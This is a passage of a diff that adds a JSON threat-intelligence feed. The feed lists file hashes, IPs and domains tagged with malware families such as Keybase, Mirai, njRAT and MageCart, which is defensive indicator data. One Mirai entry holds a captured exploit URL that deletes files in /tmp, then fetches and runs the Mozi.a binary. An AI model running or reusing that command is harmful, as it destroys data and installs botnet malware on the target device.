"seqUpdate": 17274697984932, + "hash": [ + "0ca20de06ffac99094a03ccea8925a9f", + "a7f02d49895ad51af5594985bcc87e549033720c", + "81ed93e1a4410a11059de2ee1c1cf01ac7392d85d3ae1727de71b27eed407a27" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "9eb78f94877a4593e54f3ada2555440e0728e55c", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274699411085, + "hash": [ + "2ef9a0b8cb2788ff2e100f274fe8e78e", + "f978ea3d259805a697125e170b58aa0729865887", + "854b915cff4282ed4c1022a32193bf6fc24004995373d36e94c0e2bcba045a1d" + ], + "malwareList": [ + { + "name": "Spora", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "c32a02a834bbd33eb7dcaec7ec4c561ff12af034", + "type": "network", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "domain": "141urjq9.rtxg5o2bgknsxqh6y2533pxjp4tq9999.dheekak5o635ym5wnfwndrq9.allowlisted.net", + "seqUpdate": 17274699716961, + "malwareList": [ + { + "name": "Pupy", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "b70d2383700bcf9c7e8125cbef42a49da547331c", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274701808957, + "hash": [ + "9c229d5da43f76e1e2cb20d5f35c7703", + "fbcd1c42a2329423403c5d7593b074900234061a", + "82312796b6bb45e296c7c5d46f8c23b2ec570788f4b51bcaebceebfd878dbb3c" + ], + "malwareList": [ + { + "name": "Coinminer", + "aliases": [ + "BitCoinMiner", + "BitMiner" + ] + } + ], + "threatList": null + }, + { + "id": "f78d08abcf2ff01adc4c4d9387bff82d886c7f9a", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274702657258, + "hash": [ + "082cb6c5ba97168c9b7e573eb4213a94", + "f9262b4b2af17b19a7e22058de3be384952f587d", + "5a25dd0e00e4af1bbd06867e0250a1ecd691a74d006feb19faeef1a656786473" + ], + "malwareList": [ + { + "name": "DanaBot", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "81f53844960772da44e71c4a7c32d9f7710d1096", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274703785996, + "hash": [ + "5f7563cf3cb96c4d31f2916433092ee4", + "2dba2ac971f121056c9db001cc54ad8101b7559b", + "f79e1c237764f778239add25cc4a9ef2139adca68ac557710f4b9e0498eedb93" + ], + "malwareList": [ + { + "name": "Keybase", + "aliases": [ + "Kibex" + ] + } + ], + "threatList": null + }, + { + "id": "7ea8f4bad45ad183a8a1670e4f60608bbc1d4fab", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274703790093, + "hash": [ + "b16dedd0372d921603ac5f73184591f8", + "3fc7ba2c837c2886cb769241edee17c57739fae8", + "40c3b818617e3db8a1577c7dc1103613dd4ab2c25ace90509a8b843e7ec53031" + ], + "malwareList": [ + { + "name": "Keybase", + "aliases": [ + "Kibex" + ] + } + ], + "threatList": null + }, + { + "id": "d1748728141c54fcaf0acfcb4e64cc611934b094", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274703793432, + "hash": [ + "809d2f3482d5d786f1b8097bb8a95b6e", + "d71dd6c72bda55cad631f9496071bc63e0af09e5", + "ec67a0bfb554a9deff525390f752f7c0c49587b17f3c13fefc7b84f9802cf070" + ], + "malwareList": [ + { + "name": "Keybase", + "aliases": [ + "Kibex" + ] + } + ], + "threatList": null + }, + { + "id": "6d181d29c8065f44326c07d25ef3f555030c99da", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274703797138, + "hash": [ + "f655677d65c3a89dd39edd42a21b8af3", + "e0be9567cb05a82701c07fd50b83c28c377e7646", + "23773e45d29ecb973866c9244d88d138b3322194c50495e0647494a0d0a2ebf5" + ], + "malwareList": [ + { + "name": "Keybase", + "aliases": [ + "Kibex" + ] + } + ], + "threatList": null + }, + { + "id": "b06831a925a1f77f8e25f542a96f644f37147e96", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274703800144, + "hash": [ + "d9fb840f6c117637a557f7990361fede", + "e9368f53ef54f6603544d54d2c33483d5136e9b0", + "c0915dddcf3473666542fc1c95f016be7f1cdc5c9c14bf4c60a2c3070f3d267a" + ], + "malwareList": [ + { + "name": "Keybase", + "aliases": [ + "Kibex" + ] + } + ], + "threatList": null + }, + { + "id": "5fa498e385fc4bca6dafd6a720e1675d77da3fcf", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274703802838, + "hash": [ + "59c846d1c48c9d2f7bc0c4178e4a221e", + "ea799aaca5faf889a02453edc3ac8d81cac1cb68", + "a940e2c5f7cd6869a1e28ae0fffd18d4286068b94ba5824f9c482984c2261991" + ], + "malwareList": [ + { + "name": "Keybase", + "aliases": [ + "Kibex" + ] + } + ], + "threatList": null + }, + { + "id": "46f6d891378748d120793fb897b731901f0eea7a", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274703806140, + "hash": [ + "88d531a4e52bf2740ca80e04ee776c4b", + "f1468477acc8634efec07a792abdb4a5442ea65f", + "71cffac1ab4dca62c9bac7939c6ec762f798e4f56069f084810184ec10e5bb59" + ], + "malwareList": [ + { + "name": "Keybase", + "aliases": [ + "Kibex" + ] + } + ], + "threatList": null + }, + { + "id": "c5929b1522be6cdd6e6bc285aacbb807feaaa549", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274703810341, + "hash": [ + "b90d6da9f71c70d2e93e97987771bddd", + "105a3cb62cf7e0c6dc2266c03ef0a58bf0e6944a", + "649bae9e81ee67e7cb77844ec97fa992826cc12cf368394eaae1e68eb9250b8f" + ], + "malwareList": [ + { + "name": "Keybase", + "aliases": [ + "Kibex" + ] + } + ], + "threatList": null + }, + { + "id": "a510bc65270d294f52e560d4e392e4223c55b292", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274703813267, + "hash": [ + "6793e73474501ffe7b9d1b0f63d3de42", + "11a2eb695293fb5d7119c66f41ee8948a13141d5", + "64f2b6f3e89cc9023d126dfa3f2764e4bc4f78b96190701bcc0ddf9786c91093" + ], + "malwareList": [ + { + "name": "Keybase", + "aliases": [ + "Kibex" + ] + } + ], + "threatList": null + }, + { + "id": "97279b54d3011fa2c1138d698c5282ba66e6453e", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274704055085, + "hash": [ + "f2c69da842d5f7d2605e1afdf505e0cc", + "3bee53731a00dd53cb94842de0d6f99bbc1a85f1", + "9b0329555069e20ca6ec90cf5afedcbe082c86e89e468ed6ee28a437d619e73d" + ], + "malwareList": [ + { + "name": "Keybase", + "aliases": [ + "Kibex" + ] + } + ], + "threatList": null + }, + { + "id": "d9b1853fcaac4c7276d165ef4585abcee7b2254b", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274704058224, + "hash": [ + "aa6ee14794529e8307e2417f52f970f1", + "49a1f16385c2dbcf847601a6d00940a2a0fc626c", + "5d76e3e8993e08f24c93a62b87395e0d87ae862f2d8e73af161e5d7f1ec8fe79" + ], + "malwareList": [ + { + "name": "Keybase", + "aliases": [ + "Kibex" + ] + } + ], + "threatList": null + }, + { + "id": "2f3179fb43a9828858905219246f508978103954", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274704061880, + "hash": [ + "0025f47ccdc62cda4728a810fd55c259", + "6569a933f82c9ff8c06c2cfc70da0efd92d78a95", + "683241de631f1aa5bda5523671c756f3b22d2e46b1c09628d2f66f32da1ab4fe" + ], + "malwareList": [ + { + "name": "Keybase", + "aliases": [ + "Kibex" + ] + } + ], + "threatList": null + }, + { + "id": "d6247ddcaaa1896b5098add2bce617a4b7f3b0d8", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274704064507, + "hash": [ + "7f17534592c4fb8f711534ee38921187", + "68064dcf17101bb2db21905076b648d80da85284", + "5f79d3df8580acf05d2702915773c3a6eeb42bbc908e7deb673079ef47171f9b" + ], + "malwareList": [ + { + "name": "Keybase", + "aliases": [ + "Kibex" + ] + } + ], + "threatList": null + }, + { + "id": "591e279c63a733c5b5e5678683db7a81ea8094a9", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274704068322, + "hash": [ + "63af9390c4213a39ddbbdd03878d2c04", + "7df5ce1131328c6d247fd3bcabbc72a828964d46", + "91fd117cce32810f8a43a8dbfdd79f76683a58568d9a07c8eaf7761633394412" + ], + "malwareList": [ + { + "name": "Keybase", + "aliases": [ + "Kibex" + ] + } + ], + "threatList": null + }, + { + "id": "66c26bb69fed6f9113fcd5f8c1e612f96d2b8f73", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274704071607, + "hash": [ + "1f036c340ebbc1ef630dd5dab42593b1", + "825d2dce2b96cc30830b7a6a848439a7c5a3f7fc", + "fcf70a60e6471e87cce3c42cfa4b80392ad07124964f1a3733a499c3c364d470" + ], + "malwareList": [ + { + "name": "Keybase", + "aliases": [ + "Kibex" + ] + } + ], + "threatList": null + }, + { + "id": "99410d665c8739d0a80eb34e2d509b74e725f00c", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274704075866, + "hash": [ + "0f78210fc4a877637c6649d39b5e718f", + "854f0835eb535e0b2c4c72345d0caf0dcbc3388e", + "6f858edaf9a3b497878eaa18587f29c0806602e048a1c757d474773fcf855007" + ], + "malwareList": [ + { + "name": "Keybase", + "aliases": [ + "Kibex" + ] + } + ], + "threatList": null + }, + { + "id": "0e3401e653b3752c9d14cb779706b3c4674cebb9", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274704083855, + "hash": [ + "7a10b9a765cbbddd7576892299a3a303", + "8af2710668255944788afb6ce05c8bbd5360f6a9", + "5b8360c5c3194a41fa445d943a293bcdf467341422572efc4f224d709fae5349" + ], + "malwareList": [ + { + "name": "Keybase", + "aliases": [ + "Kibex" + ] + } + ], + "threatList": null + }, + { + "id": "250f2b118a50ce54619dd14fa9f9ce57842bb0ea", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274704324307, + "hash": [ + "3ddce12950bbc09673231e6ee6b1eb79", + "915117ca67ba3c98cb215075cd0c1c44bae620d9", + "6ba634d45bbff4a0438e09d32caa392b7cb5e25d7f7f07d1d09cc7972e0c54fc" + ], + "malwareList": [ + { + "name": "Keybase", + "aliases": [ + "Kibex" + ] + } + ], + "threatList": null + }, + { + "id": "01d4237c1f1f2f00a349e9fc07b05e8897404759", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274704326716, + "hash": [ + "b03d3f301dc86074f8d33a86ebad5d58", + "dac01381a797df9c71f0f779fdb06a8a736ac47b", + "77c4ebfdf7362918689250e775afcc17a0ba93ad0723084dee5d3dce70b507eb" + ], + "malwareList": [ + { + "name": "Keybase", + "aliases": [ + "Kibex" + ] + } + ], + "threatList": null + }, + { + "id": "b305583a929c0af94699beb67785aea0600aa02a", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274704396488, + "hash": [ + "3485bb69aaf41f5c2134a858d88d4a1a", + "fed36eafa0898b41656573aac3177b82e07031eb", + "6f5bb2b35dd68f84f6e45d1d1a69a2b7b0590d14eb9631649320e75c792a7803" + ], + "malwareList": [ + { + "name": "Keybase", + "aliases": [ + "Kibex" + ] + } + ], + "threatList": null + }, + { + "id": "bb7ea9caf2ac6ee67dab3babbe5990e6722fa315", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274704925720, + "hash": [ + "ea6467373f3b1ee69a3d86ed968e90b0", + "f3fda2cf302bdb2567e8739097dfbe1f23211e7e", + "ffd9fdfa3cdba8172adf5edfbad02e8e8f421c869b0c796349903f2bdbff993e" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "50f33b6e1596626ebdcd03dc47d542b27a4da9c4", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274704928995, + "hash": [ + "c4dd89c3744866b67caa42f6ae5e5953", + "72324351534f47f18df4bcacb29465b5f10b59c1", + "682c251fddc02defea3f8f025b54e1f345a95631948bac9cf2dae826a9cb6251" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "38e2af67e83faae4025f9a6c7cf0f125c1a2bbe6", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274705998813, + "hash": [ + "69c89419deb6f7825e2ed7122604049a", + "eb31e7cc55884205b0dec689b5533e8455312e87", + "ba58423baa7380af52425f59681248ead418b97f2f36c5858aaa78f2a25f4fb2" + ], + "malwareList": [ + { + "name": "CryptoWall", + "aliases": [ + "Forgo", + "Frogo" + ] + } + ], + "threatList": null + }, + { + "id": "d545a835a85d2c75e3ddc7bad67ea019212c0eff", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274721060427, + "hash": [ + "10cb497006285075068141155fb09df2", + "e12e77596dbf55e6ec74ba90d06b20257f63faf0", + "1b238c9ec176d45d3bad7fa3c82d856f16df22c43d812618670aec8285901a0c" + ], + "malwareList": [ + { + "name": "Koadic", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "cfafd80cceb6414eb2bbd2eb5a23ee0c69f55ea5", + "type": "network", + "dateFirstSeen": "2024-09-28T00:00:00+03:00", + "dateLastSeen": "2024-09-28T00:00:00+03:00", + "seqUpdate": 17274726663754, + "ip": [ + "119.91.64.209" + ], + "malwareList": null, + "threatList": [ + { + "name": "ChamelGang", + "title": "ChamelGang - New indicators have been found" + } + ] + }, + { + "id": "f5b3266152f1847baa6a635f97917feab3d6f15e", + "type": "network", + "dateFirstSeen": "2024-09-28T00:00:00+03:00", + "dateLastSeen": "2024-09-28T00:00:00+03:00", + "domain": "66330666.com", + "seqUpdate": 17274756623946, + "malwareList": null, + "threatList": [ + { + "name": "MageCart", + "title": "MageCart - New indicators have been found" + } + ] + }, + { + "id": "29d4e38d2be783f97b44175985d01b6d964be7c4", + "type": "network", + "dateFirstSeen": "2024-09-28T00:00:00+03:00", + "dateLastSeen": "2024-09-28T00:00:00+03:00", + "domain": "tongyi33.com", + "seqUpdate": 17274756624805, + "malwareList": null, + "threatList": [ + { + "name": "MageCart", + "title": "MageCart - New indicators have been found" + } + ] + }, + { + "id": "abe4255deab1385ff10f4132c661d12947c7abf0", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274769715374, + "hash": [ + "c4da155fbf56e5ab2f0c3479b507f035", + "3546dff0fde33d7725b53e97cde2454b347ce05b", + "7af8433cbe4552c9693a3404311b2a563427adf261452170f3feba6bef88a1a7" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "290dcb7ee208d6c2c0796324a0ab38d9c172d2c6", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274769905518, + "hash": [ + "30b94e3bc541e52a001890e9b0a8769c", + "d37c7e2cee4b426d0a616625c14d9f346ae402d6", + "567ee29e2ca692603fb05f66f59479ab8b10d5ca519678bcf43af00711eb75d0" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "6082575563bfceb96aca94cbd347b61cc4bae577", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274769909401, + "hash": [ + "de5f478fb3ccef57ee22580d9fccd92a", + "e3d8e810b028db6d3801757677bf4d1194374a48", + "d303108417a607aac646b9f9b1aea4c0c6c4a32a1bce026da27b0fe1a82e8761" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "6e24fdb089bdeb28137073f16630fc55781c830c", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274769912796, + "hash": [ + "cb2df5884795baa0c8af50c02389d167", + "fae6df5b83e8953fefe15214f73849d90dc2d0ca", + "71535102be7be17d906ff3b549718296a15d8296b1c79a37ce3b3dccfa8bca6f" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "8f77da6adcfb712a6852fd3878066f856f2d586d", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274769916472, + "hash": [ + "a4ed5e474910dfe978ee22a098620d6a", + "fe67c003786dab0f321f7810935176e2e16619ae", + "73ea068ee928398671901f32d4948117858466f71bfa032b5fd7c66751e32f39" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "3037b69fad7d6554c3b77ba1c8913c6bcc59d69e", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274769919860, + "hash": [ + "a82c68feeafeeb32c1a5577c7358318b", + "6d89e6945a28ac488e10f81a663e0d93834f78a7", + "aa499840005cf5d3e2efd8646dbe90bc212d153c9e79227e9cdbad51d299b5cc" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "cc23e017a6a5b84084e7e8d3b0b280a756fad22d", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274771022481, + "hash": [ + "3b35ca00556ad83c5384601602c6c5c3", + "1c1efdbfe64d93c6a4e6f3acbb367e623e3ac2f3", + "ef46a40bb2e5bec146c8a919b9e8b24398b8db0558979f5b6e6da5cad8f0cced" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "d66e19c8eeb9be69a1bddf83d50b34f918cab53a", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274771025292, + "hash": [ + "2b4f48fb246c30f176826037c51480f5", + "86e64823241c626ae77870a6f6d72a7711e0ebd7", + "b4e27e1efd8342f8dba51d9fe5a60b6987c4d2ae2fe69a9d20809385afd24f17" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "965716f970168f077179cddd465e197f3839630d", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274771028560, + "hash": [ + "5471287368aa02e0f1d3a5e35973940e", + "a9e40ebcffd482fca45f01a71e967b2007a6f954", + "92558735981dfae4732d8a0cbf0d961efadaca8df91a02fcf25b863d23e2fee3" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "7653449eafb9ad0339cb05f0212cb73e23e414cc", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274771032562, + "hash": [ + "2d1db3eea6b4092d7506a5405d79d54d", + "c48634cad110703be2476194cbd55b138b8839ad", + "34bc682131c90c50d094b9dc4519dca55d21112dc5f721f845f5d64c05be6fbd" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "691a07decd1e0b789b007e257dabf7d072a4718c", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274771247827, + "hash": [ + "59cb90b1a526ce4646c9ec8a69f3271a", + "e1bb0a3ad08b78d76b6a33dc2d89b6d8c2378ecc", + "543e982bb2384ecb75464f3d3c48a7a89945970bebdf893b851a39867f1ec5b1" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "17471a2d9e619b849e8b267878b2e56b3bab1e0a", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274771252669, + "hash": [ + "9a2aeefb6964c65fe379babee001cf0c", + "e4ce9d27c7eabb66134130714f4d429af70cf4a8", + "78e33c68c7dbe471d3b7cafd3ec6d785d4f468e987499754a127fd057ab838e6" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "89cca2bd4cfdf96e478e93a3c86d4365ca2b4e9d", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274771255468, + "hash": [ + "9f2826b716048a6c508ae5a5a46ea125", + "f56e049b36734c9f6ca255b98ff17f9d1f3d364b", + "0e4ef346a4e7b2a8a922032921328118089828b33f37f4ad0881d8be0b929469" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "d37c02ac4504f55f1f597c1505ab06c184997fc5", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274771258480, + "hash": [ + "8e900bc701d40303dfbbd196211f24e6", + "fad1810d1871ebf7570c84fed75d8266a241102a", + "8eb941df19c7bce320f3a057e6ebe888b4c648f5d0d20130d1d720311f1e2d16" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "6524fc97ca192fdf5f2d8040b6ba0e9fe453728a", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274771261574, + "hash": [ + "a5d0f63afa42ac861e318e0a1ad18141", + "fb8df885cb8f3cdbf091c5fa9e73c822fb985623", + "8a39142e1f01ccf9ee546d45539304138efa6ba08a5885f65ae256323a650091" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "d904033ff4654724323a0cbc7e80c698d7ce24cd", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274771264106, + "hash": [ + "26760e61b568567dbce13f6f0679ec68", + "45ec271e968185389333ea4e0a119e2dfda65382", + "e1117d5d2a2e804c45ecdae4d6a67ea4f70f25f62a84d4493974600366cd2ad1" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "6cdb6ab2eae52cf010baf0260fe8eebff0b10704", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274771268250, + "hash": [ + "b15844b46907e5569896a57a4e5588b9", + "68aa57c6aa9781708cf530e524074ec66fcb51ba", + "91b3594ffcd45a22e7cf7ff662c2bdf613be2baacf68c15ad142a27faffaae78" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "2854c220b4088abbd92780a3ad62a93ce306a6ef", + "type": "file", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17274771724869, + "hash": [ + "7c59d096e8426581250396f1f306e232", + "80031cfd46e81547328ed4d9e2b3d0ef4adb6173", + "b9795a7e3d3e06096722cee44592a3444cd708024cbdac77deec2e21dbacbd66" + ], + "malwareList": [ + { + "name": "Poison Ivy", + "aliases": [ + "Darkmoon", + "PIVY" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "7820781b5698dde17821aa6c4f344ca1ac970a2b", + "type": "file", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "seqUpdate": 17274771995520, + "hash": [ + "9c2ede2554c01bf1f7cad43cf20e6642", + "c3daa0d60ba44b6894b3a44f29593d10f787655a", + "cc87ba8a434e67a8eab6196b4c7ed1b83287c310923dcc1b24796f32c0a36c78" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "91e95b5577e28124664a9ccb9acbd33a650d3f9e", + "type": "file", + "dateFirstSeen": "2024-09-28T00:00:00+03:00", + "dateLastSeen": "2024-09-28T00:00:00+03:00", + "seqUpdate": 17274857803318, + "hash": [ + "fd5f448bf4131dc6a7d37ee1b34aa33e", + "75cbec5f2518c79260f37ea14f7164cf743b7a07", + "479f7d21b677ca27b4beb73136f81120f4d5cc16552f9da883655cc990656c1e" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "2c226f4bc7297f5b002d2f1a9c216908789252e5", + "type": "file", + "dateFirstSeen": "2024-09-28T00:00:00+03:00", + "dateLastSeen": "2024-09-28T00:00:00+03:00", + "seqUpdate": 17274861585401, + "hash": [ + "26d2c0ca876a875a96900562c8daf897", + "44fb275229b24186a216bca11b9503cb6f80bd03", + "7c306458b5dffb1b2325c39e3259145886853d891d300a0cdd13bfc8c6dd2189" + ], + "malwareList": [ + { + "name": "njRAT", + "aliases": [ + "Bladabindi", + "Ratenjay" + ] + } + ], + "threatList": null + }, + { + "id": "c1cadf54cab46f9666a6abc66a29dfa91ea914ec", + "type": "file", + "dateFirstSeen": "2024-09-28T00:00:00+03:00", + "dateLastSeen": "2024-09-28T00:00:00+03:00", + "seqUpdate": 17274870428551, + "hash": [ + "3ba0d8b80f72b59d29a4c6ba05ac8707", + "b3c7d42a45c09409850c0e9aec5e0b3b97363d66", + "f4ad711dc2d2aaecc5dbbc471e54c872f1f2efbb19e6b821955162d893d00db0" + ], + "malwareList": [ + { + "name": "Coinminer", + "aliases": [ + "BitCoinMiner", + "BitMiner" + ] + } + ], + "threatList": null + }, + { + "id": "acbe2a2443a5db6c9ffe2d660968478451538573", + "type": "network", + "dateFirstSeen": "2024-09-28T00:00:00+03:00", + "dateLastSeen": "2024-09-28T00:00:00+03:00", + "url": "http://91.241.86.104/shell?cd+/tmp;rm+-rf+*;wget+http:/192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17274870810525, + "ip": [ + "91.241.86.104" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "3f4bcaedc5e772c482dccc24db22cda40f4fd274", + "type": "network", + "dateFirstSeen": "2024-09-28T00:00:00+03:00", + "dateLastSeen": "2024-09-28T00:00:00+03:00", + "seqUpdate": 17274870811319, + "ip": [ + "77.239.211.238" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "3aafc04874cafc49c810119bd866e6f2b44f3a12", + "type": "file", + "dateFirstSeen": "2024-09-28T00:00:00+03:00", + "dateLastSeen": "2024-09-28T00:00:00+03:00", + "seqUpdate": 17274881649743, + "hash": [ + "aa33ee87de261bc13dbe525e957d8a8b", + "d1a26331e306c1ad0e960063467d166d55f3253d", + "f7550b2d530a0a1eb7b224cc960edcb1d59dee02ddc399c1033ef2e3547596a9" + ], + "malwareList": [ + { + "name": "Spora", + "aliases": [] + } + ], + "threatList": null + } + ], + "count": 12494, + "settings": [], + "seqUpdate": 17274881649743 + } +} \ No newline at end of file diff --git 